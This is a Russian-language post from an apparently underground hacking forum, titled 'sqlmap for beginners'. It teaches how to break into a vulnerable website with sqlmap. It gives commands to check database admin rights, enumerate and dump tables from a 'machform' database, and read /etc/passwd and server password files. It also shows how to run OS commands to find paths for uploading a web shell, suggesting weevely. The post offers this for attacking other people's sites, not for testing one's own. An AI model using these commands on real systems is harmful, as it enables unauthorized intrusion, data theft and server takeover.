sqlmap для новичков

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time
Статус
В этой теме нельзя размещать новые ответы.

SPIFO

Участник

SPIFO

Участник
27 Авг 2015
86
29
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Всем приветик ,начнем с того, что многие новички задаются вопросом как юзать sqlmap

Начнем с самого простого ,например у нас есть уязвимый сайт ,который хотим поломать !

Итак запускаем sqlmap -u
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
-o -b --current-user --is-dba

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!


Следовательно
current user: 'root@localhost'
current user is DBA: True если False , то шансов порутать серв мало

Далее разворачиваем список таблиц в базе

sqlmap -u
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
--columns --tables

И перед Вами список таблиц ,например нам нужна таблица
ap_element_options

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!


Выполняем слудующий запрос

sqlmap -u
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
-D machform -T ap_element_options --columns

Перед Вами список из 8 колонок ,например мы хотим их полностью сохранить

Выполняем следующий запрос

sqlmap -u
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
-D machform -T ap_element_options -С option,position,aeo_id,element_id,form_id,live,opt ion_id,option_is_default --dump-all --save

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!


Читаем содержимое файлов на сервере !

sqlmap -u
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
--file-read="/etc/passwd" --file-read="httpd/pass/httpd/passwd.conf" но могут быть и в других подразделах )

Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!


Выполним еще запросик небольшой )) Раскрывем пути ,куда в дальнейшем будем лить облочку вебшелла )

sqlmap -u
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
--os-cmd=ls

Дальше думаю Вам все понятно ! В крайнем соучае используем weevely для оболочки !

Удачи
 
  • Лайк
Reactions: detruit and lucefer
Статус
В этой теме нельзя размещать новые ответы.

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя